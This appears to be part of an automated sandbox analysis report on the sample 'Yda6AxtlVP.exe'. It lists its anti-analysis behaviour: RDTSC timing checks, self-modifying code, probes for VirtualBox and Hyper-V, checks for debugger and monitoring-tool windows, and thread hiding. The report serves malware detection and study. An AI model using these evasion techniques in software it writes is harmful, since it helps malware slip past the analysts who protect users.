Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471389 second address: 7471414 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov word ptr [edx+30h], ax 0x0000000c jmp 00007F9665989DB9h 0x00000011 mov ax, word ptr [esi+32h] 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9665989DACh 0x0000001c add esi, 490B9EF8h 0x00000022 jmp 00007F9665989DABh 0x00000027 popfd 0x00000028 pushfd 0x00000029 jmp 00007F9665989DB8h 0x0000002e or al, 00000058h 0x00000031 jmp 00007F9665989DABh 0x00000036 popfd 0x00000037 popad 0x00000038 mov word ptr [edx+32h], ax 0x0000003c pushad 0x0000003d mov edi, eax 0x0000003f pushad 0x00000040 call 00007F9665989DAEh 0x00000045 pop esi 0x00000046 push eax 0x00000047 push edx 0x00000048 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471414 second address: 7471470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov eax, dword ptr [esi+34h] 0x00000009 pushad 0x0000000a mov edi, 7E4891D0h 0x0000000f mov ecx, ebx 0x00000011 popad 0x00000012 mov dword ptr [edx+34h], eax 0x00000015 pushad 0x00000016 pushfd 0x00000017 jmp 00007F9665249A01h 0x0000001c and ah, 00000056h 0x0000001f jmp 00007F9665249A01h 0x00000024 popfd 0x00000025 jmp 00007F9665249A00h 0x0000002a popad 0x0000002b test ecx, 00000700h 0x00000031 push eax 0x00000032 push edx 0x00000033 pushad 0x00000034 pushad 0x00000035 popad 0x00000036 pushad 0x00000037 popad 0x00000038 popad 0x00000039 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471470 second address: 7471476 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7471476 second address: 747147A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 747147A second address: 74714E5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007F96D59F802Dh 0x00000011 pushad 0x00000012 push ecx 0x00000013 movsx edi, cx 0x00000016 pop ecx 0x00000017 pushfd 0x00000018 jmp 00007F9665989DAFh 0x0000001d add ah, FFFFFF9Eh 0x00000020 jmp 00007F9665989DB9h 0x00000025 popfd 0x00000026 popad 0x00000027 or dword ptr [edx+38h], FFFFFFFFh 0x0000002b push eax 0x0000002c push edx 0x0000002d pushad 0x0000002e mov ax, dx 0x00000031 call 00007F9665989DAFh 0x00000036 pop eax 0x00000037 popad 0x00000038 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74714E5 second address: 74714EB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74714EB second address: 74714EF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74714EF second address: 74714F3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74B0CD6 second address: 74B0D37 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F9665989DB4h 0x00000011 adc ax, 8968h 0x00000016 jmp 00007F9665989DABh 0x0000001b popfd 0x0000001c mov edi, eax 0x0000001e popad 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushfd 0x00000024 jmp 00007F9665989DAEh 0x00000029 and al, FFFFFFC8h 0x0000002c jmp 00007F9665989DABh 0x00000031 popfd 0x00000032 mov cx, 9D3Fh 0x00000036 popad 0x00000037 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74B0D37 second address: 74B0D6C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov eax, ebx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, ebp 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e mov di, cx 0x00000011 pushfd 0x00000012 jmp 00007F9665249A00h 0x00000017 xor eax, 36BA2158h 0x0000001d jmp 00007F96652499FBh 0x00000022 popfd 0x00000023 popad 0x00000024 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 746072F second address: 746079F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ebx, 631EAF0Ah 0x00000008 mov esi, edi 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F9665989DADh 0x00000013 mov ebp, esp 0x00000015 pushad 0x00000016 mov al, B2h 0x00000018 pushfd 0x00000019 jmp 00007F9665989DB9h 0x0000001e add esi, 039F75E6h 0x00000024 jmp 00007F9665989DB1h 0x00000029 popfd 0x0000002a popad 0x0000002b pop ebp 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 jmp 00007F9665989DB8h 0x00000035 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 746079F second address: 74607A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74607A3 second address: 74607A9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 740008F second address: 7400095 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400095 second address: 7400099 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74006C3 second address: 740070F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F96652499FFh 0x00000009 or al, FFFFFFAEh 0x0000000c jmp 00007F9665249A09h 0x00000011 popfd 0x00000012 mov si, 4137h 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 xchg eax, ebp 0x0000001a jmp 00007F96652499FAh 0x0000001f push eax 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 pushad 0x00000024 popad 0x00000025 movzx esi, bx 0x00000028 popad 0x00000029 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 740070F second address: 7400736 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9665989DAAh 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400736 second address: 740073C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 740073C second address: 7400742 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400742 second address: 7400746 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400746 second address: 740077E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a jmp 00007F9665989DB4h 0x0000000f pop ebp 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F9665989DB7h 0x00000017 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 740077E second address: 7400796 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400796 second address: 740079A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B03 second address: 7400B07 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B07 second address: 7400B24 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B24 second address: 7400B66 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007F96652499FCh 0x00000011 adc ch, 00000008h 0x00000014 jmp 00007F96652499FBh 0x00000019 popfd 0x0000001a popad 0x0000001b push eax 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F96652499FBh 0x00000023 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B66 second address: 7400B7E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B7E second address: 7400B82 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400B82 second address: 7400BBC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9665989DADh 0x00000010 xor ax, B386h 0x00000015 jmp 00007F9665989DB1h 0x0000001a popfd 0x0000001b mov ah, FDh 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 push eax 0x00000021 push edx 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400BBC second address: 7400BC0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400BC0 second address: 7400BC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400BC6 second address: 7400BD8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pop ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov si, bx 0x0000000f mov eax, edx 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7400BD8 second address: 7400BF1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DB5h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74509CE second address: 74509D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7430055 second address: 743005B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 743005B second address: 74300A2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a mov ax, 02C3h 0x0000000e movzx ecx, dx 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 jmp 00007F96652499FBh 0x00000018 mov ebp, esp 0x0000001a jmp 00007F9665249A06h 0x0000001f and esp, FFFFFFF0h 0x00000022 push eax 0x00000023 push edx 0x00000024 push eax 0x00000025 push edx 0x00000026 jmp 00007F96652499FAh 0x0000002b rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74300A2 second address: 74300A6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74300A6 second address: 74300AC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74300AC second address: 74300DA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DAEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 44h 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F9665989DB7h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74300DA second address: 74300F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A04h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74300F2 second address: 743013E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebx 0x0000000c jmp 00007F9665989DB6h 0x00000011 push eax 0x00000012 jmp 00007F9665989DABh 0x00000017 xchg eax, ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007F9665989DB5h 0x0000001f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 743013E second address: 74301AB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, esi 0x0000000a pushad 0x0000000b movzx eax, dx 0x0000000e pushfd 0x0000000f jmp 00007F9665249A09h 0x00000014 sub ax, 1236h 0x00000019 jmp 00007F9665249A01h 0x0000001e popfd 0x0000001f popad 0x00000020 push eax 0x00000021 pushad 0x00000022 mov eax, edx 0x00000024 popad 0x00000025 xchg eax, esi 0x00000026 push eax 0x00000027 push edx 0x00000028 push eax 0x00000029 push edx 0x0000002a jmp 00007F9665249A07h 0x0000002f rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74301AB second address: 74301C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DB9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74301C8 second address: 74302E1 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A01h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, edi 0x0000000a pushad 0x0000000b movzx esi, di 0x0000000e pushfd 0x0000000f jmp 00007F9665249A09h 0x00000014 sbb ah, FFFFFFB6h 0x00000017 jmp 00007F9665249A01h 0x0000001c popfd 0x0000001d popad 0x0000001e push eax 0x0000001f jmp 00007F9665249A01h 0x00000024 xchg eax, edi 0x00000025 jmp 00007F96652499FEh 0x0000002a mov edi, dword ptr [ebp+08h] 0x0000002d pushad 0x0000002e pushad 0x0000002f pushfd 0x00000030 jmp 00007F96652499FCh 0x00000035 or ah, 00000038h 0x00000038 jmp 00007F96652499FBh 0x0000003d popfd 0x0000003e pushfd 0x0000003f jmp 00007F9665249A08h 0x00000044 jmp 00007F9665249A05h 0x00000049 popfd 0x0000004a popad 0x0000004b jmp 00007F9665249A00h 0x00000050 popad 0x00000051 mov dword ptr [esp+24h], 00000000h 0x00000059 jmp 00007F9665249A00h 0x0000005e lock bts dword ptr [edi], 00000000h 0x00000063 jmp 00007F9665249A00h 0x00000068 jc 00007F96D545BB67h 0x0000006e push eax 0x0000006f push edx 0x00000070 jmp 00007F9665249A07h 0x00000075 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74302E1 second address: 743033E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edi 0x00000006 pop eax 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edi 0x0000000b jmp 00007F9665989DB7h 0x00000010 pop esi 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 jmp 00007F9665989DABh 0x00000019 pushfd 0x0000001a jmp 00007F9665989DB8h 0x0000001f sbb esi, 7E691378h 0x00000025 jmp 00007F9665989DABh 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 743033E second address: 743037D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665249A09h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebx 0x0000000a pushad 0x0000000b pushad 0x0000000c jmp 00007F96652499FAh 0x00000011 mov ax, 9CA1h 0x00000015 popad 0x00000016 call 00007F96652499FEh 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460834 second address: 7460844 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DACh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460844 second address: 7460848 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460848 second address: 7460882 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007F9665989DADh 0x00000010 xor eax, 6E74BE26h 0x00000016 jmp 00007F9665989DB1h 0x0000001b popfd 0x0000001c mov dl, ch 0x0000001e popad 0x0000001f mov ebp, esp 0x00000021 pushad 0x00000022 push eax 0x00000023 push edx 0x00000024 pushad 0x00000025 popad 0x00000026 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 74508D4 second address: 7450919 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bx, 19A2h 0x00000007 mov cl, dl 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esp], ebp 0x0000000f pushad 0x00000010 mov edi, ecx 0x00000012 pushfd 0x00000013 jmp 00007F96652499FCh 0x00000018 or ah, 00000038h 0x0000001b jmp 00007F96652499FBh 0x00000020 popfd 0x00000021 popad 0x00000022 mov ebp, esp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F9665249A00h 0x0000002d rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7450919 second address: 7450928 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F9665989DABh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7450928 second address: 745092E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460AD3 second address: 7460AEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665989DB4h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460AEB second address: 7460AEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460AEF second address: 7460B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov dx, 975Eh 0x00000010 mov bx, CB6Ah 0x00000014 popad 0x00000015 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460B04 second address: 7460B1F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F9665249A07h 0x00000009 rdtsc
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRDTSC instruction interceptor: First address: 7460B1F second address: 7460B23 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Tries to evade debugger and weak emulator (self modifying code)
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSpecial instruction interceptor: First address: 1475A69 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSpecial instruction interceptor: First address: 14759CA instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSpecial instruction interceptor: First address: 16C28B5 instructions caused by: Self-modifying code
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00F39980 rdtsc 0_2_00F39980
Source: C:\Users\user\Desktop\Yda6AxtlVP.exe TID: 7824Thread sleep time: -30000s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D5255D
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D529FF FindFirstFileA,RegOpenKeyExA,CharUpperA,CreateToolhelp32Snapshot,QueryFullProcessImageNameA,CloseHandle,CreateToolhelp32Snapshot,CloseHandle,0_2_00D529FF
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeCode function: 0_2_00D5255D GetSystemInfo,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,KiUserCallbackDispatcher,FindFirstFileW,FindNextFileW,K32EnumProcesses,0_2_00D5255D
Source: Yda6AxtlVP.exe, Yda6AxtlVP.exe, 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
Source: Yda6AxtlVP.exe, 00000000.00000003.1345742967.0000000006D11000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Y\MACHINE\SYSTEM\ControlSet001\Services\VBoxSFlQ=Y
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSTEM\ControlSet001\Services\VBoxSF
Source: Yda6AxtlVP.exeBinary or memory string: Hyper-V RAW
Source: Yda6AxtlVP.exe, 00000000.00000002.1452550089.0000000001D7F000.00000004.00000020.00020000.00000000.sdmp, Yda6AxtlVP.exe, 00000000.00000003.1420543487.0000000001D7F000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlldz
Source: Yda6AxtlVP.exe, 00000000.00000003.1317281598.000000000774F000.00000004.00001000.00020000.00000000.sdmpBinary or memory string: SYSINTERNALSNum_processorNum_ramnameallfreedriversNum_displaysresolution_xresolution_y\*recent_filesprocessesuptime_minutesC:\Windows\System32\VBox*.dll01vbox_firstSYSTEM\ControlSet001\Services\VBoxSFvbox_secondC:\USERS\PUBLIC\public_checkWINDBG.EXEdbgwireshark.exeprocmon.exex64dbg.exeida.exedbg_secdbg_thirdyadroinstalled_appsSOFTWARE\Microsoft\Windows\CurrentVersion\UninstallSOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Uninstall%d%s\%sDisplayNameapp_nameindexCreateToolhelp32Snapshot failed.
Source: Yda6AxtlVP.exe, 00000000.00000002.1451570120.0000000001609000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
Source: Yda6AxtlVP.exe, 00000000.00000003.1343992663.0000000001D03000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeSystem information queried: ModuleInformationJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeProcess information queried: ProcessInformationJump to behavior

Anti Debugging

barindex
Hides threads from debuggers
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeThread information set: HideFromDebuggerJump to behavior
Tries to detect sandboxes and other dynamic analysis tools (window names)
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeOpen window title or class name: regmonclass
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeOpen window title or class name: gbdyllo
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeOpen window title or class name: procmon_window_class
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeOpen window title or class name: ollydbg
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeOpen window title or class name: filemonclass
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeFile opened: NTICE
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeFile opened: SICE
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeFile opened: SIWVID
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeProcess queried: DebugPortJump to behavior
Source: C:\Users\user\Desktop\Yda6AxtlVP.exeProcess queried: DebugPortJump to behavior
